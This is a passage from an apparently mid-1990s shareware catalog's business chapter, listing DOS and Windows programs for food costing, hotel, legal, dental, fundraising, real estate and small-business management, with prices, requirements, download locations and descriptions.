LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Designed for multi unit food service with central purchasing. + Record central or direct unit receiving or issue to and from + units. Maintains Perpetual inventory of central storage. + Inventory tools such as location coding almost make the job of + controlling inventory enjoyable! Purchasing history by product + and by vendor. Shortage reports based on par levels. Receiving + reports by day, week or whatever. P&L reports by profit center + + Chapter 7, "Business" 293 + + + + - excellent tool for analysis and budgeting. Basis for recipe + cost. + + + Product: Managing Your Food + Author: MYF Software (Greg Aakhus), 805-398-1449 + Version: 4.51 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: 35.00US (add 5.00US for shipping to Canadian + addresses) (add 5.00US for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, mail support; bonus + utilities; all ASP-wide offers (see page 6). 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: MYF*.ZIP on BBSs (call 805-682-6158 to download it at + no charge). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A complete food manager designed for food manufacturers, + institutional food planners and cooks, restaurant managers, + dietitians, diabetics, bakers, and the home shopper. Its use is + easy enough for the novice, yet comprhensive enough for the + professional. Will track cost, protein, carbohydrates, fat, + calories, cholesterol, fatty acids, fiber, vitamins, minerals, + food exchanges, and %RDA. Outputs hundreds of reports including + NLEA label information. + + + Product: PC-FOOD II FOOD COSTING + Author: SCHRECK SOFTWARE, 612-731-6822 + Version: 7.02 (06-03-95) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $57.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 12 months of phone, CompuServe, + mail support; discounts on upgrades. + Look for: PCFD702.ZIP on BBSs; PCFOOD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 76467,2213 for + assistance). + Download size: 186k (about 14 minutes with a 2400 baud modem) + Description: + Calculates and maintains food cost and required selling prices. + Edit portion sizes, expected waste, ingredient costs, serving + sizes, etc. and see the effect on costs and margins. Print + reports including required price changes based on user variance + criteria. Calc total revenue, food cost and gross profit for a + banquet, etc. User selectable sorted displays. Up to 30 + ingredients in a recipe. Up to 30 ingredients and or recipes + in a menu item. Full mouse support. + + Chapter 7, "Business" 294 + + + + Product: RECIPE FILE MANAGEMENT + Author: First Step Software (Larry Larsen), 208-376-4411 + Version: 3.3 (02-01-94) + Needs: IBM PC, DOS 3.2 or better. 250k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RECMGT33.ZIP on BBSs; RECMGT.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + A kitchen production tool: + 1. Maintain file for fast access to edit or print recipe. + 2. Adjust recipe yields in a flash. + 3. Resource for many food product weight & measure + equivalent. + A management tool: + 1. Update cost of one or all recipes in file. + 2. Generate shopping/pull list of selected recipes. + 3. Access inventory software for current cost data. + Can run as a stand alone or interface with inventory software. + + + Product: RESTAURANT COST CONTROL + Author: First Step Software (Larry Larsen), 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; CGA monitor; Hard + disk. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RSTCTL42.ZIP on BBSs; RSTCTL.ZIP on CompuServe in + CIS:IBM forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Offers management a state of the art tool to sharpen purchasing + practices, tighten inventory levels and provide cost analysis + for budgeting. Physical inventory functions provide a wide + varity of forms, reports and calculations that make the job of + controlling inventory easier and faster. Profit & Loss analysis + will save you $$$$$. Paying vendors is fast and flexible; cash, + manual check or printed check. Provides cost data base for our + Recipe File Management software. + + Chapter 7, "Business" 295 + + + + 7.9.4 Hotel/motel management + + Product: Book-It + Membership and activity booking system. See full description + on page 302. + + Product: MotelMAX + Author: MKM Software, 504-885-7470 + Version: 2.10 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: EGA monitor. + Registration fee: $135.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 6). + Look for: MOTEL210.ZIP on BBSs; MTLMAX.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 15 (or contact userID 72704,3566 for + assistance). + PsL#: 10928 + Download size: 365k (about 27 minutes with a 2400 baud modem) + Description: + Includes reservations, advance deposits, front desk, + accounting, general ledger, travel agent commissions, guest + history, room inventory, folio reprints and many, many reports. + One key check-in/check-out. Supports international date and + currency formats. Automatically assigns room rates for up to + 10 room types. Password protected. + + + 7.9.5 Legal & law enforcement + + Product: CHRONOS + Interactive historical timelines. See full description on + page 469. + + Chapter 7, "Business" 296 + + + + Product: The Lawyer's DeskTop + Author: DataPro Enterprises, Inc., 713-978-7431 + Version: 2.1 (07-25-94) + Needs: IBM AT (80286), DOS 3.3 or better. 430k RAM; CGA monitor; + Hard disk; HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor. + Registration fee: $79.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, newsletter, mail support; 2-month return + policy; bonus utilities. + Look for: availability unknown on BBSs; LDT.ZIP on CompuServe in + CIS:LAWSIG forum LIBrary 5. + SWREG#: 1578 + Download size: 533k (about 40 minutes with a 2400 baud modem) + Description: + A legal management work group application that provides an + integrated approach to law office management for the small to + medium size law firm and solo practicioners. It contains case/ + matter management, document management, time and billing, + calendaring (to dos and appointments), docket control, case + critical date tickling, contact managment, payables, a full + text search engine, utilities and much more. + + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 305. + + 7.9.6 Library + + See also: Education, Library/bibliography. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 194. + + Product: EZ-Index - National Geographic + Reference Index for National Geographic Mag. See full + description on page 517. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 278. + + Product: REFILE + Document management software. See full description on + page 446. + + Product: SmartTracker Books + Track, catalog & organize your books. See full description on + page 521. + + Chapter 7, "Business" 297 + + + + 7.9.7 Medical & dental + + Product: Tolman Dental Program + Author: Peter T. Smith D.D.S., 516-281-5544 + Version: 5.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $599.00 + Registration benefits: Printed manual, bonus data files, six + months phone support. + Look for: TOLMAN#.ZIP on BBSs (multiple files) (call ALL-ASP-BBS + to download it at no charge); TOLMN*.ZIP on CompuServe in + CIS:DBADVISOR forum LIBrary 8 (multiple files) (or contact + userID 72617,70 for assistance); TOLMAN#.ZIP on GEnie in + DATABASE forum LIBrary 4 (multiple files) (or contact userID + XMG16757 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A CompuServe Magazine (Dec '91) pick as a "Current Hit," is an + efficient management program for a mid-size dental office. With + electronic claims, it is not incomplete. It will handle + billing, recalls, insurance, referral tracking, a variety of + patient lists, production reports, mail merge and more. With + online help, look-up windows and a User's Manual, the program + is easy to learn. It was used/improved in the dentist/author's + office for 4 years before release. + + + 7.9.8 Non-profit businesses + + 7.9.8.1 Fund raising + + Product: FundRaiser Basic + Author: Professional Support Software (Gene Weinbeck), + 417-256-4280 + Version: 1.32 (03-08-95) + Needs: IBM PC, DOS 3.1 or better. 510k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $48.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 2-month return + policy; site license; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 1 free + + Chapter 7, "Business" 298 + + + + update disk(s) sent out. Booklet on successful fundraising + tips & techniques. + Look for: FRB132.ZIP on BBSs; FRB132.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72077,1015 for + assistance). + SWREG#: 4530 + Download size: 457k (about 34 minutes with a 2400 baud modem) + Description: + Very easy to learn and use. Here are the tools you need to + fundraise like a real professional. In one typical session, + you can: record donations, make address changes, code donors, + print timely thank you letters and labels, print a deposit + report - all without leaving the program! Targeted mailings + are a snap, as are the impressive and useful reports. Now, + import you existing mailing list easily and quickly. + + + 7.9.9 Political parties + + Product: THE CALLING TREE + Author: IN/QUEST, LLC (Jim Turner), 303-671-0800 + Version: 1.7a (08-31-94) + Needs: IBM PC, DOS 2.11 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hercules monitor; Hayes-compatible modem; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: ZTREE17.ZIP on BBSs (call 303-665-6091 to download it + at no charge); ZTREE.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 1 (or contact userID 70505,531 for assistance); + ZTREE14.EXE on GEnie in IBMPC forum LIBrary 3 (or contact + userID XTY25572 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Mananage tree like organization data. Instances where one + person is related to several others and they each in turn are + related to several other and so one until the outer limits of + the tree are reached. Sort of like a contact manager for + political party information matrixes, network marketing MLM + companies, and emergency contact systems where I may call 5 + people and they each in turn will call 5 people and so on until + all members of the tree have have the word. + + Chapter 7, "Business" 299 + + + + 7.9.10 Real estate + + Product: CRISP-R REAL ESTATE ACCOUNTING + Author: JAMES W. FUNSTEN SOFTWARE, 415-974-6201 + Version: 2.10 (07-01-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. + Registration fee: $55.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, mail support. + 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A bookkeeping system for up to 100 or more different properties + using just one bank account (or up to three bank accounts) for + all properties in one data base. Allows up to five data bases + of different groups of properties. There are 250 user named + accounts and 250 payor/payees, with unlimited special payor/ + payees. Reports are for any one property, all properties, or a + group of properties. Fast and easy to use. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 328. + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 495. + + Product: Home Refinancing + Compute time value savings from refinancing. See full + description on page 328. + + Product: LOAN CHIEF + Loan schedules, charts and solve for calc. See full + description on page 334. + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 348. + + Chapter 7, "Business" 300 + + + + Product: THE MORTGAGE ANALYZER + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.04 (12-20-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hard disk. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. + Look for: MRT204.ZIP on BBSs; MORTAZ.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A package designed to help make educated decisions regarding + mortgages. Includes options for calculating amortization + schedules, loan qualification, payoff time for refinancing, + mortgage acceleration, side by side mortgage comparisons, buy + vs. rent, lease vs. sell and a group of mortgage related + calculators. Calculates FHA, VA and conventional mortgage + insurance, daily interest, points, tax savings analysis and + more. Supports ARMs with caps and margins and a whole lot + more! + + + Product: OpenHome + Author: Temprano Software + Version: 3.10 (07-16-95) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Hard + disk; HP LaserJet printer. + Strongly recommended: Mouse. + Registration fee: $47.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; OPNHME.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 6. + Download size: 297k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A selling property qualification generator for Windows 3.1. You + supply the selling property information and current rates for + fixed-, adjustable- and FHA-loans, and OpenHome generates an + attractive, easy-to-understand sheet which shows "cash to + close", "monthly payment" and "minimum monthly income" for up + to three different down payments of your choice. Can use any of + your Windows TrueType fonts and can even print the + qualification sheet in color, if you have a color printer. + + Chapter 7, "Business" 301 + + + + Product: Property Master + Author: MSdataBase Solutions, 703-777-5660 + Version: 4.01 (05-20-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Mouse; Epson printer. Will not work with any version + of DOS 4.0. + Registration fee: $25.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); registration commissions. + Look for: PMAST41.ZIP on BBSs. + Download size: 498k (about 37 minutes with a 2400 baud modem) + Description: + A rental property database and rental management system for + landlords or property managers. Keep track of single family, + multiple family (apartments) or businesses. Associate landlords + to properties; properties to other properties. Track income and + expenses by property (rent, repairs) & general expenses + (mileage, postage). Tax reports for Schedule E & 1099 expenses. + Keep track of deposits, refunds & leases. + + + 7.9.11 Safety & fire protection + + Product: SCBA Trak + Author: Raymond A.J. Pesek, 216-225-0248 + Version: 2.40 (01-28-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Network (LAN). + Registration fee: $35.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, mail support. + Lifetime free upgrading allowed. + Look for: SCBATR24.ZIP on BBSs (call 719.591.7415 to download it + at no charge); SCBATR.ZIP on CompuServe in CIS:SAFETYNET forum + LIBrary 13 (or contact userID 72270,650 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Inventory & maintenance record system for Self-Contained + Breathing Apparatus and PASS units. Keeps track of repetitive + maintenance needs & costs for masks, back packs, bottles, & + PASS units. Gives early warning of packs coming due for flow + test, regulator overhaul, mask fit tests, etc. Warns of PASS + units coming due for battery change. Early warning of bottles + coming due for hydro testing or composite end of life. Many + reports, incl. budget projections, equipment lists, activity + reports, etc. + + Chapter 7, "Business" 302 + + + + 7.9.12 Small businesses + + Product: Book-It + Author: Instinctive Systems Ltd, +44(0)1663-741894 + Version: 1.1b (01-17-96) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $79.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; + lifetime return policy; all ASP-wide offers (see page 6); + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; BOOKIT.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 9 (or contact userID 100103,3722 for + assistance). + SWREG#: 5422 + PsL#: 14014 + Download size: 1676k (about 125 minutes with a 2400 baud modem) + Description: + Windows membership and activity / event booking system for + small hobby type clubs and organisations as well as larger + businesses such as activity clubs and holiday companies. + Facilities include - club / organisation enquiry and follow up, + membership administration, event or activity booking and + administration, credit note administration, activity supplier + and venue details, mail merge and label printing facilities, + flexible reporting facilities, contect sensitive help system. + + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 317. + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 281. + + Product: Folders + Personal information manager network email. See full + description on page 138. + + Chapter 7, "Business" 303 + + + + Product: GARDENING BUSINESS + Author: Redei Enterprises, 310-832-6984 + Version: 1.1 (03-25-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; SVGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: XMS memory; math coprocessor. + Registration fee: $125.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 2100k (about 156 minutes with a 2400 baud modem) + Description: + A business management software for small companies. It keeps + track of customers and their orders, prices, supplier + information, material & labor requirements, buy history and + cashflow. It automatically creates work orders, prints + invoices and reports. Designed for those small businesses + where practically no inventory is necessary. Can be used for + any small businesses with similar requirements. + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 311. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 314. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 140. + + Product: PC-AP + Accounts payable. See full description on page 257. + + Product: PC-AR + Accounts receivable. See full description on page 264. + + Product: PC-GL + General ledger. See full description on page 258. + + Product: PC-PR + Payroll writing. See full description on page 268. + + Product: PCINV + Invoice writing. See full description on page 258. + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 227. + + Chapter 7, "Business" 304 + + + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 310. + + Product: Sales & Samples + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Epson printer; EMS + memory; XMS memory. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); registration commissions. 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJISS.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJISS.* on CompuServe in CIS:WORK + forum LIBrary 9 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3481 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + A relational database application expressly developed to allow + the user to easily enter sales orders generated from a home + sales business selling cosmetics. It consists of two databases, + one for the customer specific information such as address, + phone etc., the other for the orders, samples and invoices that + automatically calculates totals including State sales tax if + applicable. The reports generated include totals for a + customer, totals by day, and group totals. Form is similar to + paper form. + + Chapter 7, "Business" 305 + + + + Product: SMALL BUSINESS ADVISOR + Author: RONIN Software, 206-391-4036 + Version: 94.4 (10-15-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. Does not + run on IBM PCjr. + Registration fee: $29.95 (add $5.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 3 months + of unlimited phone, mail support; bonus utilities; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: SBA94_4.ZIP on BBSs (call 703-680-9269 to download it + at no charge). + PsL#: 11079 + Download size: 712k (about 53 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Unique expert program puts the tax/legal/business knowledge of + a Harvard lawyer, "Big 6" CPA at your disposal instantly. Very + easy to use! Gives your small business quick, current tax & + legal advice based on your state law on all fed/state taxes, + OSHA, ADA, envir. laws & more. Creates detailed customized + startup checklist for your business, your state in seconds. + Wide range of Q&A "consulting sessions" such as whether to + incorp. or elect Sub S. EZ-to-use income/estate/corp tax + modules. + + + Product: Time Keeper + D.base to record and report empl. attendance. See full + description on page 282. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 277. + + 7.9.13 Other + + Product: Book-It + Membership and activity booking system. See full description + on page 302. + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 302. + + Product: League Manager + Manages any youth sports organization. See full description on + page 567. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 256. + + Chapter 7, "Business" 306 + + + + Product: Time Keeper + D.base to record and report empl. attendance. See full + description on page 282. + + + 7.10 Forms generators + + Product: DR. FORM + Author: IrwinWare (Russ Irwin), 412-931-9577 + Version: 3.1 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, CompuServe, mail support; 1-month return policy; + bonus data; discounts on upgrades. 3-month free upgrading + allowed. + Look for: DRFORM31.ZIP on BBSs (call 508-368-7139 to download it + at no charge); DRFORM.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 71045,222 for assistance). + SWREG#: 1250 + PsL#: 10925 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Shareware Magazine Editor's Choice Award. Make professional + quality forms easily. Full mouse support. Move, copy, draw + lines, etc. Automatic grid maker. Create master forms and fill + them in. Print on pre-printed forms and make templates. Context + sensitive help screens. Print bold, italic, etc. Supports dot + matrix & laser printers. Can print legal size forms (14") and + can print landscape on laser printers. Much more.... + + + Product: The Letterhead Kit-32/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 211. + + Product: The Letterhead Kit/DOS [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 212. + + Product: The Letterhead Kit/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 213. + + Product: Resume Master Deluxe + Easy-to-use but powerful resume creator. See full description + on page 195. + + Chapter 7, "Business" 307 + + + + Product: The Right Resume + Windows resume creator & job search package. See full + description on page 195. + + Product: WebForms + WWW forms generator! See full description on page 361. + + 7.10.1 Forms fillers + + Product: Form Editor (FED) + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 1.15 (01-01-96) + Needs: IBM PC, DOS 1.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$15.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware; discounts on other products. + Look for: FED115.ZIP on BBSs (call 216-661-9065 to download it at + no charge); FED115.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 73057,3113 for assistance); FED115.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + Uses standard ASCII test files as forms. Sees underlines as + input fields. Prints forms to any printer. Saves forms or forms + and data. Can save data only for import to databases. + + + Product: PageFocus + A productivity program for everyday use. See full description + on page 483. + + 7.10.2 Forms processing + + Product: Form Editor (FED) + Form Editor/Filler for standard text files. See full + description on page 307. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 88. + + + 7.11 Sales aids + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 298. + + Chapter 7, "Business" 308 + + + + Product: CATALOG-ON-A-DISK + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 4.00 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $55.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, BBS, CompuServe, + newsletter, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: CATALG40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); CATALG.ZIP on CompuServe in CIS:IDEAS forum + LIBrary 9 (or contact userID 71333,1577 for assistance); + CATALG40.ZIP on GEnie in HOSB forum LIBrary 12 (or contact + userID D.VEANER1 for assistance). + Download size: 357k (about 27 minutes with a 2400 baud modem) + Description: + Customers browse or search for products, order as they go + along, and print the order form with shipping and tax pre- + calculated to be sent by mail, fax, modem, or phone. The + compressed catalog fits a large number of products on disk and + provides security for prices and other data. You make the + catalog to best reflect your company. Flexible, easy to order + from, innovative. Submenus, size and color boxes, mix and + match products, info and coupons, many features. + + + Product: Computerized Christmas Cards + 3 animated musical Xmas cards: duplicate send. See full + description on page 576. + + Product: DAYO PRICE BOOK + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 309 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOBE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A system of creating and maintaining specialized pricing for + your customer/clients. Special printouts (price books/catalogs) + may be printed to a standard printer, or to a Hewlett Packard + (tm) Laserjet or compatible. It requires the presence of DAYO + Inventory and DAYO POS programs/databases. Special price book + methods include fixed, margin/cost plus, and list/retail + discounts. + + + Product: Folders + Personal information manager network email. See full + description on page 138. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 118. + + Product: THE MORTGAGE ANALYZER + Mortgage schedules, comparisons, acceleration. See full + description on page 299. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 310. + + Product: WebForms + WWW forms generator! See full description on page 361. + + + 7.12 Marketing + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 140. + + Chapter 7, "Business" 310 + + + + Product: ProAct Contact Management + Author: ProDomus, Inc. (Philip S. Will), 203-233-0705 + Version: 2.6 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; discounts on upgrades. 12-month free upgrading allowed. + Look for: PRACT26*.ZIP on BBSs (multiple files) (call + 703-680-9269 to download it at no charge); PRACT.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 2046 + PsL#: 11212 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Powerful home or business contact profiler, scheduler, and + merge letter/document word processor. Organize contacts by + company and name. Profile contacts by 10 categories. Apply + and batch process "action plans" for one or more contacts. + Includes three standard letter formats, user defined labels, + editable "Three Line Help", F1 Help, pick lists, and auto + dialing. Small demonstration program and tutorial included. + Multiple file sets so you can segregage home, office, or other + special groups. + + + Product: WebForms + WWW forms generator! See full description on page 361. + + + 7.13 Work-at-home + + See also: Home & hobby. + + Product: Back Soon! + Screen-saver/message-taking utility. See full description on + page 62. + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 134. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 135. + + Product: Dear Diary + Diary/daily journal. See full description on page 146. + + Chapter 7, "Business" 311 + + + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 317. + + Product: HOME/OFFICE INVENTORY + Author: ProDomus, 